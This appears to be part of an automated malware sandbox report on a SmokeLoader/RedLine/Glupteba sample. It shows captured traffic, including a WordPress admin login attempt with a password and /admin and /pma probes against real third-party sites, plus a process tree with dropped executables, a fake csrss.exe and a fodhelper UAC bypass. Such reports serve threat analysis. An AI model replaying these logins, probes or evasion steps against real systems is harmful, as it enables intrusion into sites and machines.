Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:16 UTC	432	OUT	POST /wp-login.php HTTP/1.1 Host: oceanictrailers.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://oceanictrailers.com.au/wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 Content-Length: 142 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:16 UTC	142	OUT	Data Raw: 6c 6f 67 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 70 77 64 3d 54 72 61 69 6c 65 72 73 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 63 65 61 6e 69 63 74 72 61 69 6c 65 72 73 2e 63 6f 6d 2e 61 75 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=administrator&pwd=Trailers&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:17 UTC	508	IN	HTTP/1.1 200 OK Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure x-frame-options: SAMEORIGIN content-length: 6263 date: Fri, 22 Dec 2023 20:15:17 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:17 UTC	860	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4f 63 65 61 6e 69 63 20 54 72 61 69 6c 65 72 73 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Oceanic Trailers — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv
2023-12-22 20:15:17 UTC	5403	IN	Data Raw: 2e 61 75 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 63 65 61 6e 69 63 74 72 61 69 6c 65 72 73 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f Data Ascii: .au/wp-admin/css/login.min.css?ver=6.4.2' media='all' /><meta name='referrer' content='strict-origin-when-cross-origin' /><meta name="viewport" content="width=device-width" /><link rel="icon" href="https://oceanictrailers.com.au/wp-content/uploads/

Session ID	Source IP	Source Port	Destination IP	Destination Port
363	192.168.2.4	60805	209.124.80.122	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:16 UTC	164	OUT	GET /admin HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:17 UTC	382	IN	HTTP/1.1 302 Found Date: Fri, 22 Dec 2023 20:15:16 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/" X-Redirect-By: WordPress Location: https://cicfl.com/wp-admin/ Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
364	192.168.2.4	61064	13.35.116.12	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:16 UTC	167	OUT	GET /pma HTTP/1.1 Host: www.wika.co.in Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:17 UTC	1142	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Content-Length: 173 Connection: close Date: Fri, 22 Dec 2023 20:15:15 GMT Server: web Location: https://www.wika.com/en-in/pma X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/) X-ManagedFusion-Rewriter-Version: 3.7 X-UA-Compatible: IE=edge strict-transport-security: max-age=31536000; includeSubDomains; Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: ; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline'; Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XXS-Protection: 1; mode=block X-Powered-By: ARR/3.0 X-Cache: Miss from cloudfront Via: 1.1 8c0e9a1aadc3a75a523925b4aae73930.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-C2 X-Amz-Cf-Id: OEA1bkr2yKlF7d2T_D4KldQhfSm22SX3Y0vgn2WYujgWzX3q2gD75Q==
2023-12-22 20:15:17 UTC	173	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 55 52 49 20 74 68 61 74 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 6b 61 2e 63 6f 6d 2f 65 6e 2d 69 6e 2f 70 6d 61 22 3e 6d 6f 76 65 64 20 74 6f 20 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Moved Permanently</title></head><body><p>The URI that you requested has been <a href="https://www.wika.com/en-in/pma">moved to here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
365	192.168.2.4	61271	104.24.82.4	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:16 UTC	168	OUT	GET /pma/ HTTP/1.1 Host: thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:17 UTC	620	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:17 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: https://www.thenile.com.au/pma/ via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O5qOugWr8Tl4VyarIahiCpxCNRvZ26sa6Lu3GLy%2BBD%2Fir32X1n0%2FLhpTR8u%2Fqah7QlfrC6r2UNGYmMkquJkyuVaFoZlROrmJ4uLv3o6xL7qHsrWqqN3vwpPBoyQId8Rj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0932ec17746b-MIA
2023-12-22 20:15:17 UTC	245	IN	Data Raw: 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: ef<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/pma/">here</a>.</p></body></html>
2023-12-22 20:15:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	21:11:49
Start date:	22/12/2023
Path:	C:\Users\user\Desktop\xqz8sQ4mZB.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\xqz8sQ4mZB.exe
Imagebase:	0x400000
File size:	351'744 bytes
MD5 hash:	C03FD7D0315EACAE0CF170692FCF1F2F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.1628585594.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1690528865.000000000071D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1690470943.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1690470943.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1690454958.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1690637836.0000000002211000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1690637836.0000000002211000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	21:11:55
Start date:	22/12/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	3
Start time:	21:12:14
Start date:	22/12/2023
Path:	C:\Users\user\AppData\Roaming\ibjhisi
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ibjhisi
Imagebase:	0x400000
File size:	351'744 bytes
MD5 hash:	C03FD7D0315EACAE0CF170692FCF1F2F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1929092219.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1929092219.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1929134962.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1929134962.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000003.1878296905.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1928946704.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1929009378.00000000005CC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 35%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	6
Start time:	21:12:24
Start date:	22/12/2023
Path:	C:\Users\user\AppData\Local\Temp\CA65.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\CA65.exe
Imagebase:	0x400000
File size:	2'017'792 bytes
MD5 hash:	EE1049D8F8248D11080582FE27F96843
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.1987043149.0000000005261000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	21:12:25
Start date:	22/12/2023
Path:	C:\Users\user\AppData\Local\Temp\CA65.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\CA65.exe
Imagebase:	0x400000
File size:	2'017'792 bytes
MD5 hash:	EE1049D8F8248D11080582FE27F96843
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	8
Start time:	21:12:26
Start date:	22/12/2023
Path:	C:\Users\user\AppData\Local\Temp\D217.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\D217.exe
Imagebase:	0xdb0000
File size:	3'303'032 bytes
MD5 hash:	B709E72980047F5E1E97AA351B487FFE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 27%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	9
Start time:	21:12:27
Start date:	22/12/2023
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 /s C:\Users\user\AppData\Local\Temp\D8BF.dll
Imagebase:	0x7ff7b0c60000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	10
Start time:	21:12:28
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	/s C:\Users\user\AppData\Local\Temp\D8BF.dll
Imagebase:	0x360000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	11
Start time:	21:12:29
Start date:	22/12/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	12
Start time:	21:12:29
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6844 -ip 6844
Imagebase:	0xb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	21:12:29
Start date:	22/12/2023
Path:	C:\Users\user\AppData\Local\Temp\DFD5.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\DFD5.exe
Imagebase:	0xa40000
File size:	4'576'256 bytes
MD5 hash:	47F65FC2573C54674112A6E75A27AAB0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	low
Has exited:	true

Target ID:	14
Start time:	21:12:29
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6844 -s 788
Imagebase:	0xb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	15
Start time:	21:12:31
Start date:	22/12/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x390000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	16
Start time:	21:12:31
Start date:	22/12/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xb80000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	17
Start time:	21:12:31
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7044 -ip 7044
Imagebase:	0xb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	18
Start time:	21:12:31
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1364
Imagebase:	0xb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Has exited:	true

Target ID:	19
Start time:	21:12:33
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6844 -ip 6844
Imagebase:	0xb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	20
Start time:	21:12:33
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 7044 -ip 7044
Imagebase:	0xb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	21
Start time:	21:12:33
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1364
Imagebase:	0xb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Has exited:	true

Target ID:	22
Start time:	21:12:34
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2232 -ip 2232
Imagebase:	0xb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	23
Start time:	21:12:34
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2232 -ip 2232
Imagebase:	0xb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	24
Start time:	21:12:34
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 848
Imagebase:	0xb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	25
Start time:	21:12:34
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 828
Imagebase:	0xb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	26
Start time:	21:12:35
Start date:	22/12/2023
Path:	C:\Users\user\AppData\Local\Temp\F6A9.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\F6A9.exe
Imagebase:	0x400000
File size:	351'232 bytes
MD5 hash:	3D1D5C95AB6C993ACAEDBB2C719079F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001A.00000002.2142532116.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001A.00000002.2142822770.000000000081D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001A.00000003.2086345336.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.2142714397.0000000000731000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001A.00000002.2142714397.0000000000731000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.2142554421.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001A.00000002.2142554421.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	27
Start time:	21:12:37
Start date:	22/12/2023
Path:	C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Drivers\csrss.exe"
Imagebase:	0x400000
File size:	2'017'792 bytes
MD5 hash:	EE1049D8F8248D11080582FE27F96843
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001B.00000002.2142171453.0000000005600000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Target ID:	28
Start time:	21:12:38
Start date:	22/12/2023
Path:	C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Drivers\csrss.exe"
Imagebase:	0x400000
File size:	2'017'792 bytes
MD5 hash:	EE1049D8F8248D11080582FE27F96843
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	29
Start time:	21:12:39
Start date:	22/12/2023
Path:	C:\Users\user\AppData\Local\Temp\4E3.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4E3.exe
Imagebase:	0x400000
File size:	4'479'880 bytes
MD5 hash:	5DAC05753690AC45C4020CCE37B861FE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001D.00000002.4256567957.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001D.00000002.4252280793.0000000000843000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001D.00000002.4256235874.0000000002B6C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001D.00000003.2142137549.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001D.00000002.4256567957.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	false

Target ID:	30
Start time:	21:12:42
Start date:	22/12/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Sysnative\cmd.exe /C fodhelper
Imagebase:	0x7ff7bf450000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	31
Start time:	21:12:42
Start date:	22/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	32
Start time:	21:12:42
Start date:	22/12/2023
Path:	C:\Windows\System32\fodhelper.exe
Wow64 process (32bit):	false
Commandline:	fodhelper
Imagebase:	0x7ff732070000
File size:	49'664 bytes
MD5 hash:	85018BE1FD913656BC9FF541F017EACD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	21:12:42
Start date:	22/12/2023
Path:	C:\Windows\System32\fodhelper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\fodhelper.exe"
Imagebase:	0x7ff732070000
